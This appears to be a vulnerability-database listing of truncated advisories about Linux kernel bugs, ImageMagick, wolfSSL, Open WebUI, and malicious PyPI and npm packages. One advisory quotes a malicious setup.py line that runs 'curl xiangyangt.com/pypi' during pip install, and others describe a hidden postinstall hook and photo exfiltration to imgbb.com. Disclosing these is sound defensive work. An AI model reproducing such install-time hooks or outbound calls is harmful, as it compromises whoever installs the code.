SUSE CVE-2026-46042

In the Linux kernel, the following vulnerability has been resolved: mm/mempolicy: fix memory leaks in weightedinterleaveautostore weightedinterleaveautostore fetches oldwistate inside the if !input block only. This causes two memory leaks: 1. When a user writes "false" and the current mode is...

CVE-2026-46042

In the Linux kernel, CVE-2026-46042 fixes two memory leaks in mm/mempolicy's weighted_interleave_auto_store(). The bug occurred because old_wi_state was fetched inside the !input block, causing leaks when users set the mode to manual (false) and the function returned early, and leaving old_wi_sta...

Linux kernel 安全漏洞

The Linux kernel is the core of the open-source operating system Linux, developed by the Linux Foundation in the United States. There is a security vulnerability in the Linux kernel, which stems from the unconditional success of the spintrylock operation within the NMI context on a single-process...

PT-2026-43909

Name of the Vulnerable Software and Affected Versions Linux kernel affected versions not specified Description Memory leaks occur in the weighted interleave auto store function within the mm/mempolicy component. The issue arises because the old wi state is fetched only when the input is null. Thi...

Malicious code in baidubsrc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...

MAL-2026-4380 Malicious code in @dekuzxc/nexca (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 35a4db02ce3d3ea022c8a6b5349975b4721d3f2c5b516b6c3dd3dddbfa802271 When a consumer uses the advertised api.listen/listenE2EE flow, every incoming message attachment of type "photo" is auto-uploaded to imgbb.com using...

Astra Linux - уязвимость в linux-5.10

In the Linux kernel, the following vulnerabilities have been resolved: dpll: Fixed the dpllxarefdel function for multiple registrations. Currently, if there are multiple registrations of the same pin on the same dpll device, the following warnings are observed: WARNING: CPU: 5 PID: 2212 at...

Astra Linux - уязвимость в imagemagick

Stack-based buffer overflow and unconditional jump in ReadXPMImage in coder/xpm.c in ImageMagick 7.0.10-7...

Astra Linux - уязвимость в linux-6.1

In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: Wait unconditionally after issuing the ENDXFER command. Currently, for all controller IP/versions except DWC3usb3 = 310a, a 1ms wait is required unconditionally for the completion of ENDXFER when the IOC is not set. Th...

Malicious code in glass-of-water (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector df79336313f71fac8158ff6f3e0160d0e99a8d1d84c452505fd3739af5838a69 glassofwater/init.py embeds 10 Google Gemini API keys AIzaSy... split across 5-part dictionaries and reassembled at runtime by getapikey L6-19. The...

CVE-2026-45671

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user can permanently delete files owned by other users via DELETE /api/v1/files/id when the target file is referenced in any shared chat. The hasaccesstofile...

Malicious code in joi-pack (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5ca38e3574ffcb0fabb105616e28108137c8256e2c70aeede59623bca5df496a The package declares a postinstall hook "postinstall": "node postinstall.js" in package.json that runs unconditionally on npm install. The script's o...

Linux kernel 安全漏洞

The Linux kernel is the core of the open-source operating system Linux, developed by the Linux Foundation in the United States. There is a security vulnerability in the Linux kernel, which stems from the unconditional call to ixp46xptpfind in ixp4xxgettsinfo, potentially leading to null pointer...

Astra Linux - уязвимость в linux-5.15, linux-6.1

In the Linux kernel, the following vulnerability has been resolved: netfilter: nftables: unconditionally flush pending work before notifier syzbot reports: KASAN: slab-uaf in nftctxupdate include/net/netfilter/nftables.h:1831 KASAN: slab-uaf in nftcommitrelease net/netfilter/nftablesapi.c:9530...

EUVD-2026-25535

In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix call removal to use RCU safe deletion Fix rxrpc call removal from the rxnet-calls list to use listdelrcu rather than listdelinit to prevent stuffing up reading /proc/net/rxrpc/calls from potentially getting into an...

CVE-2026-35344

The CVE describes a flaw in the dd utility from uutils coreutils: when truncating files, it unconditionally calls Result::ok(), suppressing errors. This behavior mirrors GNU for special files like /dev/null but also hides failures on regular files or directories caused by full disks or read-only ...

DEBIAN-CVE-2026-5503

In TLSXEchChangeSNI, the ctx-extensions branch set extensions unconditionally even when TLSXFind returned NULL. This caused TLSXUseSNI to attach the attacker-controlled publicName to the shared WOLFSSLCTX when no inner SNI was configured. TLSXEchRestoreSNI then failed to clean it up because its...

CVE-2026-5503 out-of-bounds write in TLSX_EchChangeSNI via attacker-controlled publicName

In TLSXEchChangeSNI, the ctx-extensions branch set extensions unconditionally even when TLSXFind returned NULL. This caused TLSXUseSNI to attach the attacker-controlled publicName to the shared WOLFSSLCTX when no inner SNI was configured. TLSXEchRestoreSNI then failed to clean it up because its...

Amazon Linux 2 : kernel, --advisory ALAS2KERNEL-5.4-2026-119 (ALASKERNEL-5.4-2026-119)

The version of kernel installed on the remote host is prior to 5.4.302-223.457. It is, therefore, affected by a vulnerability as referenced in the ALAS2KERNEL-5.4-2026-119 advisory. In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix recvmsg unconditional requeue...

WordPress plugin Gravity SMTP 信息泄露漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. WordPres...